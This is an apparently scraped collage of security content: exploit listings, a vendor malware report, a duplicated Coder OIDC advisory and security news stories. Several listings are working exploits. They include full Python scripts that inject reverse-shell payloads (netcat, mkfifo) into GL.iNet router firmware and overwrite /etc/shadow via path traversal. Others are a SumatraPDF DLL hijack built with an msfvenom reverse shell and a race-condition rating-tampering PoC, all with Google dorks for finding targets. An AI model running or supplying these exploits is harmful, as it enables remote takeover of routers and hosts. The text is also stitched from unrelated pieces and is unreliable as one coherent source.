KK Star Ratings versions prior to 5.4.6 suffer from rate tampering via a race condition vulnerability.

    # Exploit Title: kk Star Ratings < 5.4.6 - Rating Tampering via RaceCondition# Google Dork: inurl:/wp-content/plugins/kk-star-ratings/# Date: 2023-11-06# Exploit Author: Mohammad Reza Omrani# Vendor Homepage: https://github.com/kamalkhan# Software Link: https://wordpress.org/plugins/kk-star-ratings/# WPScan :https://wpscan.com/vulnerability/6f481d34-6feb-4af2-914c-1f3288f69207/# Version: 5.4.6# Tested on: Wordpress 6.2.2# CVE : CVE-2023-4642# POC:1- Install and activate kk Star Ratings.2- Go to the page that displays the star rating.3- Using Burp and the Turbo Intruder extension, intercept the ratingsubmission.4- Send the request to Turbo Intruder using Action > Extensions > TurboIntruder > Send to turbo intruder.5- Drop the initial request and turn Intercept off.6- In the Turbo Intruder window, add "%s" to the end of the connectionheader (e.g. "Connection: close %s").7- Use the code `examples/race.py`.8- Click "Attack" at the bottom of the window. This will send multiplerequests to the server at the same moment.9- To see the updated total rates, reload the page you tested.

KK Star Ratings Race Condition

Last year, 11% of all detections on Macs were caused by malware. The illuminating figure gives a view into the world of Mac cyberthreats.

We’re going to let you in on a little cybersecurity secret… There’s malware on Mac computers. There pretty much always has been.

As revealed in our 2024 ThreatDown State of Malware report, a full 11% of all detections recorded by Malwarebytes on Mac computers in 2023 were for different variants of malware—the catch-all term that cybersecurity researchers use to refer to ransomware, trojans, info stealers, worms, viruses, and more.

That 11% figure may not sound imposing but remember that many people today still believe that Apple devices, including Mac computers, are invulnerable to cyberinfections because of some sort of vague “Apple magic.”

In reality, “Apple magic” is more a byproduct of old advertising (this 2006 commercial from the “I’m a Mac, and I’m a PC” series did irreparable harm) and faulty conclusions concerning cybersecurity’s biggest breaches and attacks: People mistakenly believe that because _most_ attacks target Windows computers and servers, _no_ attacks target Macs.

The truth is far more nuanced, as the visible, overwhelming focus of cyberattacks on Windows machines is a consequence of Microsoft’s long-standing success in business computing.

For decades, every multinational corporation, every local travel agency, every dentist, every hospital, every school, government, and city hall practically ran on Windows. This mass adoption was good for Microsoft and its revenue, but it also drew and maintained the interests of cybercriminals, who would develop malware that could impact the highest number of victims. This is why the biggest attacks, even today, predominantly target Windows-based malware and the sometimes-unpatched vulnerabilities found in Windows software and applications.  

Essentially, as Windows is the biggest target, cybercriminals zero in their efforts respectively.

But new information last year revealed that could all be changing.

****Mac malware tactics shifted in 2023****

Apple’s desktop and laptop operating system, macOS, represents a 31% share of US desktop operating systems, and roughly 25% of all businesses reportedly utilize Mac devices somewhere in their networks.

Already, the cybercriminals have taken note.

In April 2023, the most successful and dangerous ransomware in the world—LockBit—was found to have a variant developed for Mac. Used in at least 1,018 known attacks last year, LockBit ransomware, and the operators behind it, destroyed countless businesses, ruined many organizations, and, according to the US Department of Justice, brought in more than $120 million before being disrupted by a coordinated law enforcement effort in February of this year.

While the LockBit variant for Mac was not operational upon discovery, the LockBit ransomware gang said at the time that it was “actively being developed.” Fortunately, LockBit suffered enormous blows this year, and the ransomware gang is probably less concerned with Mac malware development and more concerned with “avoiding prison.”

Separately, in September 2023, Malwarebytes discovered a cybercriminal campaign that tricked Mac users into accidentally installing a type of malware that can steal passwords, browser data, cookies, files, and cryptocurrency. The malware, called Atomic Stealer (or AMOS for short) was delivered through “malvertising,” a malware delivery tactic that abuses Google ads to send everyday users to malicious websites that—though they may appear legitimate—fool people into downloading malware.

In this campaign, when users searched on Google for the financial marketing trading app “TradingView,” they were sometimes shown a malicious search result that appeared entirely authentic: a website with TradingView branding was visible, and download buttons for Windows, Mac, and Linux were clearly listed.

But users who clicked the Mac download button instead received AMOS.

This malvertising site mimics TradingView to fool users into downloading malware for different operating systems.

Just months later, AMOS again wriggled its way onto Mac computers, this time through a new delivery chain that has more typically targeted Windows users.

In November, Malwarebytes found AMOS being distributed through a malware delivery chain known as “ClearFake.” The ClearFake campaign tricks users into believing they’re downloading an approved web browser update. That has frequently meant a lot of malicious prompts mimicking Google Chrome’s branding and update language, but the more recent campaign imitated the default browser on Mac devices—Safari.

A template is used that mimics the official Apple websites and webpages to convince users into downloading a Safari “update” that instead contains malware.

As Malwarebytes Labs wrote at the time:

> “This may very well be the first time we see one of the main social engineering campaigns, previously reserved for Windows, branch out not only in terms of geolocation but also operating system.”

****Replace “magic” with Malwarebytes****

Cyberthreats on Mac aren’t non-existent, they’re just different. But different threats still need effective protection, which is where Malwarebytes Premium can help.

Malwarebytes Premium detects and blocks the most common infostealers that target Macs—including AMOS—along with annoying browser hijackers and adware threats such as Genieo, Vsearch, Crossrider, and more. Stay protected, proactively, with Malwarebytes Premium for Mac.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 No “Apple magic” as 11% of macOS detections last year came from malware 

### Summary
A vulnerability in Coder's OIDC authentication could allow an attacker to bypass the `CODER_OIDC_EMAIL_DOMAIN` verification and create an account with an email not in the allowlist. Deployments are only affected if the OIDC provider allows users to create accounts on the provider (such as public providers like `google.com`).

### Details
During OIDC registration, the user's email was improperly validated against the allowed `CODER_OIDC_EMAIL_DOMAIN`s. This could allow a user with a domain that only partially matched an allowed domain to successfully login or register (e.g. `user@exploitcorp.com` would match the allowed domain `corp.com`).

An attacker could register a domain name that exploited this vulnerability and register on a Coder instance with a public OIDC provider.

### Impact
Coder instances with OIDC enabled and protected by the `CODER_OIDC_EMAIL_DOMAIN` configuration.

Coder instances using a private OIDC provider are not affected, as arbitrary users cannot register through a private OIDC provider without first having an account on the provider.

Public OIDC providers (such as `google.com` without permitted domains set on the OAuth2 App) are impacted.

GitHub authentication and external authentication are not impacted.

### Was my deployment impacted?
To check if your deployment was exploited:
- View the audit log on your deployment for unexpected registered users (using the `action:register` filter)
- Check the users list for unexpected users
    - Users created via this exploit will have a domain that ends with one of the allowed domains but doesn’t fully match (e.g. `@exploitcorp.com` instead of `@corp.com`)

### Patched Versions
This vulnerability is remedied in
- v2.8.4
- v2.7.3
- v2.6.1

All versions prior to these patches are affected by the vulnerability. **It is recommended that customers upgrade their deployments as soon as possible if they are utilizing OIDC authentication with the `CODER_OIDC_EMAIL_DOMAIN` setting.**

### Thanks
- https://github.com/arcz
- https://www.trailofbits.com

### References
https://github.com/coder/coder/security/advisories/GHSA-7cc2-r658-7xpf
https://github.com/coder/coder/commit/4439a920e454a82565e445e4376c669e3b89591c
https://nvd.nist.gov/vuln/detail/CVE-2024-27918

**Summary**

A vulnerability in Coder's OIDC authentication could allow an attacker to bypass the CODER_OIDC_EMAIL_DOMAIN verification and create an account with an email not in the allowlist. Deployments are only affected if the OIDC provider allows users to create accounts on the provider (such as public providers like google.com).

**Details**

During OIDC registration, the user's email was improperly validated against the allowed CODER_OIDC_EMAIL_DOMAINs. This could allow a user with a domain that only partially matched an allowed domain to successfully login or register (e.g. user@exploitcorp.com would match the allowed domain corp.com).

An attacker could register a domain name that exploited this vulnerability and register on a Coder instance with a public OIDC provider.

**Impact**

Coder instances with OIDC enabled and protected by the CODER_OIDC_EMAIL_DOMAIN configuration.

Coder instances using a private OIDC provider are not affected, as arbitrary users cannot register through a private OIDC provider without first having an account on the provider.

Public OIDC providers (such as google.com without permitted domains set on the OAuth2 App) are impacted.

GitHub authentication and external authentication are not impacted.

**Was my deployment impacted?**

To check if your deployment was exploited:

*   View the audit log on your deployment for unexpected registered users (using the action:register filter)
*   Check the users list for unexpected users
    *   Users created via this exploit will have a domain that ends with one of the allowed domains but doesn’t fully match (e.g. @exploitcorp.com instead of @corp.com)

**Patched Versions**

This vulnerability is remedied in

*   v2.8.4
*   v2.7.3
*   v2.6.1

All versions prior to these patches are affected by the vulnerability. **It is recommended that customers upgrade their deployments as soon as possible if they are utilizing OIDC authentication with the CODER_OIDC_EMAIL_DOMAIN setting.**

**Thanks**

*   https://github.com/arcz
*   https://www.trailofbits.com

**References**

GHSA-7cc2-r658-7xpf  
coder/coder@4439a92  
https://nvd.nist.gov/vuln/detail/CVE-2024-27918

**References**

*   GHSA-7cc2-r658-7xpf
*   coder/coder@1171ce7
*   coder/coder@2ba8491
*   coder/coder@2d37eb4
*   coder/coder@4439a92

GHSA-7cc2-r658-7xpf: Coder's OIDC authentication allows email with partially matching domain to register

GL.iNet AR300M versions 3.216 and below suffer from an OpenVPN client related remote code execution vulnerability.

    #!/usr/bin/env python3# Exploit Title: GL.iNet <= 3.216 Remote Code Execution via OpenVPN Client# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/v1/openwrt-ar300m-3.216-0321-1679391449.tar# Version: 3.216# Tested on: GL.iNet AR300M# CVE: CVE-2023-46456import socketimport requestsimport readlinefrom time import sleepfrom random import randintfrom sys import stdout, argvfrom threading import Threadrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def generate_random_string():  return ''.join([chr(randint(97, 122)) for x in range(6)])def add_config_file(url, auth_token, payload):  data = {'file': ('{}'.format(payload), 'client\ndev tun\nproto udp\nremote 127.0.0.1 1194\nscript-security 2')}  try:    r = requests.post(url, files=data, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()  except requests.exceptions.RequestException:    print('[X] Error while adding configuration file')    return False  return Truedef verify_config_file(url, auth_token, payload):  try:    r = requests.get(url, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()    if not r.json()['passed'] and payload not in r.json()['passed']:      return False  except requests.exceptions.RequestException:    print('[X] Error while verifying the upload of configuration file')    return False  return Truedef add_client(url, auth_token):  postdata = {'description':'RCE_client_{}'.format(generate_random_string())}  try:    r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()  except requests.exceptions.RequestException:    print('[X] Error while adding OpenVPN client')    return False  return Truedef get_client_id(url, auth_token, payload):  try:    r = requests.get(url, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()    for conn in r.json()['clients']:      if conn['defaultserver'] == payload:        return conn['id']    print('[X] Error: could not find client ID')    return False  except requests.exceptions.RequestException:    print('[X] Error while retrieving added OpenVPN client ID')  return Falsedef connect_vpn(url, auth_token, client_id):  sleep(0.25)  postdata = {'ovpnclientid':client_id, 'enableovpn':'true', 'force_client':'false'}  r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)def cleanup(url, auth_token, client_id):  try:    r = requests.post(url, data={'clientid':client_id}, headers={'Authorization':auth_token}, verify=False)    r.raise_for_status()  except requests.exceptions.RequestException:    print('[X] Error while cleaning up OpenVPN client')    return False  return Truedef get_command_response(s):  res = ''  while True:    try:      resp = s.recv(1).decode('utf-8')      res += resp    except UnicodeDecodeError:      pass    except socket.timeout:      break  return resdef revshell_listen(revshell_ip, revshell_port):  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.settimeout(5)  try:    s.bind((revshell_ip, int(revshell_port)))    s.listen(1)  except Exception as e:    print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))    exit(1)  try:    clsock, claddr = s.accept()    clsock.settimeout(2)    if clsock:      print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))      res = ''      while True:        command = input('$ ')        clsock.sendall('{}\n'.format(command).encode('utf-8'))        stdout.write(get_command_response(clsock))  except socket.timeout:    print('[-] No connection received in 5 seconds, probably server is not vulnerable...')    s.close()  except KeyboardInterrupt:    print('\n[*] Closing connection')    try:      clsock.close()    except socket.error:      pass    except NameError:      pass    s.close()def main(base_url, auth_token, revshell_ip, revshell_port):  print('[+] Started GL.iNet <= 3.216 OpenVPN client config filename RCE exploit')  payload = '$(busybox nc {} {} -e sh).ovpn'.format(revshell_ip, revshell_port)  print('[+] Filename payload: "{}"'.format(payload))  print('[*] Uploading crafted OpenVPN config file')  if not add_config_file(base_url+'/api/ovpn/client/upload', auth_token, payload):    exit(1)  if not verify_config_file(base_url+'/cgi-bin/api/ovpn/client/uploadcheck', auth_token, payload):    exit(1)  print('[+] File uploaded successfully')  print('[*] Adding OpenVPN client')  if not add_client(base_url+'/cgi-bin/api/ovpn/client/addnew', auth_token):    exit(1)  client_id = get_client_id(base_url+'/cgi-bin/api/ovpn/client/list', auth_token, payload)  if not client_id:    exit(1)  print('[+] Client ID: ' + client_id)  print('[*] Triggering connection to created OpenVPN client')  Thread(target=connect_vpn, args=(base_url+'/cgi-bin/api/ovpn/client/set', auth_token, client_id)).start()  print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))  revshell_listen(revshell_ip, revshell_port)  print('[*] Clean-up by removing OpenVPN connection')  if not cleanup(base_url+'/cgi-bin/api/ovpn/client/remove', auth_token, client_id):    exit(1)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 5:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))    exit(1)  main(argv[1], argv[2], argv[3], argv[4])

GL.iNet AR300M 3.216 Remote Code Execution

GL.iNet AR300M versions 4.3.7 and below suffer from an OpenVPN client related remote code execution vulnerability.

    #!/usr/bin/env python3# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar# Version: 4.3.7# Tested on: GL.iNet AR300M# CVE: CVE-2023-46454import socketimport requestsimport readlinefrom time import sleepfrom random import randintfrom sys import stdout, argvfrom threading import Threadrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def trigger_revshell(url, auth_token, payload):  sleep(0.25)  data = {    'jsonrpc': '2.0',    'id': randint(1000, 9999),    'method': 'call',    'params': [      auth_token,      'plugins',      'get_package_info',      {'name': 'bas{}e-files'.format(payload)}    ]  }  requests.post(url, json=data, verify=False)def get_command_response(s):  res = ''  while True:    try:      resp = s.recv(1).decode('utf-8')      res += resp    except UnicodeDecodeError:      pass    except socket.timeout:      break  return resdef revshell_listen(revshell_ip, revshell_port):  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.settimeout(5)  try:    s.bind((revshell_ip, int(revshell_port)))    s.listen(1)  except Exception as e:    print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))    exit(1)  try:    clsock, claddr = s.accept()    clsock.settimeout(2)    if clsock:      print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))      res = ''      while True:        command = input('$ ')        clsock.sendall('{}\n'.format(command).encode('utf-8'))        stdout.write(get_command_response(clsock))  except socket.timeout:    print('[-] No connection received in 5 seconds, probably server is not vulnerable...')    s.close()  except KeyboardInterrupt:    print('\n[*] Closing connection')    try:      clsock.close()    except socket.error:      pass    except NameError:      pass    s.close()def main(base_url, auth_token, revshell_ip, revshell_port):  print('[+] Started GL.iNet <= 4.3.7 RCE exploit')  payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)  print('[+] Reverse shell payload: "{}"'.format(payload))  print('[*] Triggering reverse shell connection')  Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()  print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))  revshell_listen(revshell_ip, revshell_port)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 5:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))    exit(1)  main(argv[1], argv[2], argv[3], argv[4])

GL.iNet AR300M 4.3.7 Remote Code Execution

GL.iNet AR300M versions 4.3.7 and below suffer from an arbitrary file writing vulnerability.

    #!/usr/bin/env python3# Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write# Google Dork: intitle:"GL.iNet Admin Panel"# Date: XX/11/2023# Exploit Author: Michele 'cyberaz0r' Di Bonaventura# Vendor Homepage: https://www.gli-net.com# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar# Version: 4.3.7# Tested on: GL.iNet AR300M# CVE: CVE-2023-46455import cryptimport requestsfrom sys import argvrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)def craft_shadow_file(salted_password):  shadow_content  = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)  shadow_content += 'daemon:*:0:0:99999:7:::\n'  shadow_content += 'ftp:*:0:0:99999:7:::\n'  shadow_content += 'network:*:0:0:99999:7:::\n'  shadow_content += 'nobody:*:0:0:99999:7:::\n'  shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'  shadow_content += 'stubby:x:0:0:99999:7:::\n'  shadow_content += 'ntp:x:0:0:99999:7::\n'  shadow_content += 'mosquitto:x:0:0:99999:7::\n'  shadow_content += 'logd:x:0:0:99999:7::\n'  shadow_content += 'ubus:x:0:0:99999:7::\n'  return shadow_contentdef replace_shadow_file(url, auth_token, shadow_content):  data = {    'sid': (None, auth_token),    'size': (None, '4'),    'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),    'file': ('shadow', shadow_content)  }  requests.post(url, files=data, verify=False)def main(base_url, auth_token):  print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')  password = input('[?] New password for root user: ')  salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)  shadow_content = craft_shadow_file(salted_password)  print('[+] Crafted shadow file:\n{}'.format(shadow_content))  print('[*] Replacing shadow file with the crafted one')  replace_shadow_file(base_url+'/upload', auth_token, shadow_content)  print('[+] Done')if __name__ == '__main__':  if len(argv) < 3:    print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))    exit(1)  main(argv[1], argv[2])

GL.iNet AR300M 4.3.7 Arbitrary File Write

SumatraPDF version 3.5.2 suffers from a DLL hijacking vulnerability using CRYPTBASE.DLL. DLL hijacking in this version was already discovered by Ravishanka Silva in February of 2024 but the findings did not include this DLL.

    SumatraPDF 3.5.2 DLL Hijack# Exploit Title: Sumatra PDF 3.5.2 DLL Hijack# Date: 03.03.2024# Exploit Author: Krishna Vamshi Katta Rokkaiah# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer# Version: 3.5.2# Tested on: Windows 11# CVE : CVE-2024-25884Description:In Sumatra PDF version 3.5.2, a DLL hijacking vulnerability is possible allowing a local attacker to get a shell and execute code on the host system in context of the currently logged-on user. This is possible by creating / placing a malicious DLL in the installation directory. The affected DLL is CRYPTBASE.DLL.Proof of Concept:1. Use MSFVenom to create a malicious DLL:msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o CRYPTBASE.DLL2. Copy this file to the Sumatra PDF installation folder:C:\Users\<username>\AppData\Local\SumatraPDF\3. Start a listener in attacking system:nc -nlvp 77774. Start the Sumatra PDF application and notice a reverse shell in the attacking system.Demo:https://drive.google.com/file/d/1dSJG_JwxPd9ztAzDs6xV4y83-c_83AOx/view

SumatraPDF 3.5.2 DLL Hijacking

By Deeba Ahmed
It is unclear how much the hacker received as part of the Facebook bug bounty program.
This is a post from HackRead.com Read the original post: Nepali Hacker Tops Hall of Fame by Exposing Facebook’s Zero-Click Flaw

Samip Aryal, a cybersecurity researcher and an ethical hacker from Nepal, bypassed the system’s rate-limiting feature and subsequently checked possible combinations of 6-digit numbers (from 000000 to 999999) for two hours.

Samip Aryal, a Nepali bug bounty hunter, discovered a zero-click flaw in Facebook’s password reset system, potentially allowing hackers to compromise any targeted account. This exploit earned Aryal his highest bug bounty, making him top the Facebook Hall of Fame for White-Hat Hackers 2024 ranking, though the exact bounty amount remains unknown.\]

Samip Aryal tops Facebook Hall of Fame list

Aryal discovered a way to abuse Facebook’s password reset functionality without rate-limiting. The bug allowed attackers to hijack user accounts through “zero-click” attacks (without user interaction) by requesting a password reset and brute force the 6-digit security codes. 

The vulnerability was discovered in Facebook’s password reset functionality. It allowed hackers to bypass the system’s rate-limiting feature and subsequently check possible combinations of 6-digit numbers (from 000000 to 999999) for two hours.

In his blog, Aryal revealed finding a vulnerable endpoint on Android Studio while testing Facebook versions. He received a pop-up in the password reset flow offering users to send a security code through Facebook notification. The code remained active for two hours despite incorrect inputs.

“I didn’t see any sort of code invalidation after entering the correct code but with multiple previous invalid tries (unlike in the SMS reset functionality),” Aryal explained.

He used a brute-force attack methodology to cover the entire search space in an hour, revealing that some users had the nonce code displayed on the notification, a zero-click exploit. The code was displayed on another screen with a single click.

For your information, a cryptographic nonce is an arbitrary number that can only be used once in a cryptographic communication. He further noted that hackers could hijack Facebook user accounts by choosing any account, going to its password reset flow, selecting “Send code via Facebook notification,” trying any code to receive a server response, and brute forcing it in two hours. Facebook application users would receive notifications with a six-digit code or prompting them to tap to see the login code.

PoC GIF

Aryal responsibly disclosed the flaw to Facebook on January 30, 2024, and the issue was fixed on February 2. 

The vulnerability could lead to personal information theft, disinformation spread, and network attacks. Being aware of emerging security threats on Meta and other social networking platforms is also crucial to keep your accounts protected.

It is worth mentioning that Meta accounts have particularly been the target of scams lately. In March 2023, researchers at Guardio discovered an info-stealing campaign involving fake ChatGPT extensions claiming to integrate with Google search results but in reality attempting to steal Facebook accounts. 

WithSecure cybersecurity firm identified a connection between recent DarkGate malware attacks and Vietnam-based threat actors attempting to hijack Meta business accounts and steal sensitive data in October 2023.

To stay safe, users should enable two-factor authentication, use strong, unique passwords, be cautious with password reset requests, and stay updated on security threats. 

1.  **6 of the Best Crypto Bug Bounty Programs**
2.  **10 Famous Bug Bounty Hunters of All Time**
3.  **Bug bounty: Hack Tesla Model 3 to win your own Model 3**
4.  **OpenAI’s ChatGPT Bug Bounty Program – Earn $200 to $20k**
5.  **Bug Bounty: Earn $40K for hacking Facebook, Instagram, WhatsApp**

Nepali Hacker Tops Hall of Fame by Exposing Facebook’s Zero-Click Flaw

Plus: Apple warns about sideloading apps, a court orders NSO group to turn over the code of its Pegasus spyware, and an investigation finds widely available security cams are wildly insecure.

To send those notifications that awaken a device and appear on its screen without a user’s interaction, apps and smartphone operating system makers must store tokens that identify the device of the intended recipient. That system has created what US senator Ron Wyden has called a “digital post office” that can be queried by law enforcement to identify users of an app or communications platform. And while it has served as a powerful tool for criminal surveillance, privacy advocates warn that it could just as easily be turned against others such as activists or those seeking an abortion in states where that’s now illegal.

In many cases, tech firms don’t even demand a court order for the data: Apple, in fact, only demanded a subpoena for the data until December. That allowed federal agents and police to obtain the identifying information without the involvement of a judge until it changed its policy to demand a judicial order.

Europe's sweeping Digital Markets Act comes into force next week and is forcing major "gatekeeper" tech companies to open up their services. Meta-owned WhatsApp is opening its encryption to interoperate with other messaging apps; Google is giving European users more control over their data; and Apple will allow third-party app stores and the sideloading of apps for the first time.

Apple's proposed changes have proved controversial, but ahead of the March 7 implementation date the company has reiterated its belief that sideloading apps creates more security and privacy risks. It may be easier for apps on third-party apps stores, the company says in a white paper, to contain malware or try to access people's iPhone data. Apple says it is bringing in new checks to try to make sure apps are safe.

"These safeguards will help keep EU users' iPhone experience as secure, privacy-protecting, and safe as possible—although not to the same degree as in the rest of the world," the company claims. Apple also says it has heard from EU organizations, such as those in banking and defense, which say they are concerned about employees installing third-party apps on work devices.

WhatsApp scored a landmark legal win this week against the notorious mercenary hacking firm NSO Group in its long-running lawsuit against that spyware seller for allegedly breaching its app and the devices of its users. The judge in the case, Phyllis Hamilton, sided with WhatsApp in its demand that NSO Group hand over the code of its Pegasus spyware, which has long been considered one of the most sophisticated pieces of spyware to target mobile devices, sometimes through vulnerabilities in WhatsApp. The code handover—which includes versions of Pegagus from 2018 to 2020 as well as NSO’s documentation around its spyware—could help WhatsApp prove its allegations that NSO hacked 1,400 of its users, including at least 100 members of “civil society” such as journalists and human rights defenders. “Spyware companies and other malicious actors need to understand they can be caught and will not be able to ignore the law,” a WhatsApp spokesperson told the _Guardian_.

Here’s a solid rule of thumb: Don’t put any device in or around your home that has a camera, an internet connection, and is made by a Chinese manufacturer you’ve never heard of. In the latest reminder of that maxim, Consumer Reports this week revealed that countless brands of video-enabled doorbells have absolutely shambolic security, to the degree that for many of the devices, anyone can walk up to them outside your door, hold a button to pair their own smartphone with it, and then spy through your camera. In some cases, they can even obtain just a serial number from the device that lets them hijack it via the internet from anywhere in the world, according to the investigation. Consumer Reports found that these devices were sold under the brand names Eken and Tuck but that they appeared to share a manufacturer with no fewer than 10 other devices that all had similar designs. And while those devices might sound obscure, they’re reportedly sold through major retail platforms like Amazon, Walmart, Sears, Shein, and Temu. In some cases, Amazon had even marked the devices with their “Amazon’s Choice: Overall Pick” badge—even after Consumer Reports alerted Amazon to the security flaws.

The Privacy Danger Lurking in Push Notifications

By Waqas
Bifrost RAT, also known as Bifrose, was originally identified two decades ago in 2004.
This is a post from HackRead.com Read the original post: New Bifrost RAT Variant Targets Linux Devices, Mimics VMware Domain

The latest version of Bifrost RAT employs sophisticated techniques including typosquatting, to avoid detection and complicate efforts to trace its origins.

Cybersecurity experts at Palo Alto Networks’ Unit 42 have uncovered a new cybersecurity threat: a new variant of the Bifrost RAT (also known as Bifrose) targeting Linux systems. This variant, utilizing a tricky domain named download.vmfare(.)com, is designed to evade detection and compromise targeted systems.

The malicious domain bears a not-so-easy-to-distinguish resemblance to a legitimate VMware domain, with the only difference being the substitution of the letter “F” for the “W” in the domain: VM**w**are becomes VM**f**are. For your information, VMware is a leading provider of virtualization and cloud computing software and services.

This type of attack is called a **typosquatting attack** in which malicious actors register domain names similar to popular ones, relying on users making typing errors to visit their sites, often for phishing or malware distribution purposes. For example, “**It’s Google.com, not ɢoogle.com**.”

VirusTotal score for the malicious domain (screenshot: Palo Alto Networks’ Unit 42)

Bifrost, a remote access Trojan (RAT) dating back to 2004, is notorious for its ability to hide within systems, inject malicious code into legitimate processes, and establish covert communication channels with external servers. This allows attackers to steal sensitive data with ease.

The latest version of Bifrost, as detailed by researchers in their technical **blog post**, employs sophisticated techniques to avoid detection and complicate efforts to trace its origins. By encrypting collected data using RC4 encryption, and the aforementioned domain with a deceptive name, the malware makes it challenging for security experts to thwart its activities.

Additionally, the malware’s recent deployment on a server hosting an ARM version hints at an expansion of its targets.

Analysis of the malware’s code reveals intricate manoeuvres to establish connections and gather data, showcasing its advanced capabilities in evading detection. Palo Alto Networks detected over 100 instances of Bifrost activity in recent months, signalling a critical need for enhanced security measures.

To safeguard against Bifrost attacks, Unit 42 researchers recommend a multi-faceted approach including regular system updates, strong access controls, deployment of endpoint security solutions, and vigilant monitoring of network activity.

1.  New Linux Malware “Migo” Exploits Redis for Cryptojacking
2.  Free Download Manager Site Pushed Linux Password Stealer
3.  Malicious Ads Infiltrate Bing AI Chatbot in Malvertising Attack
4.  Hamas Hackers Hit Israelis with New BiBi-Linux Wiper Malware
5.  Mirai-based NoaBot Botnet Hits Linux Systems with Cryptominer

Tag

#google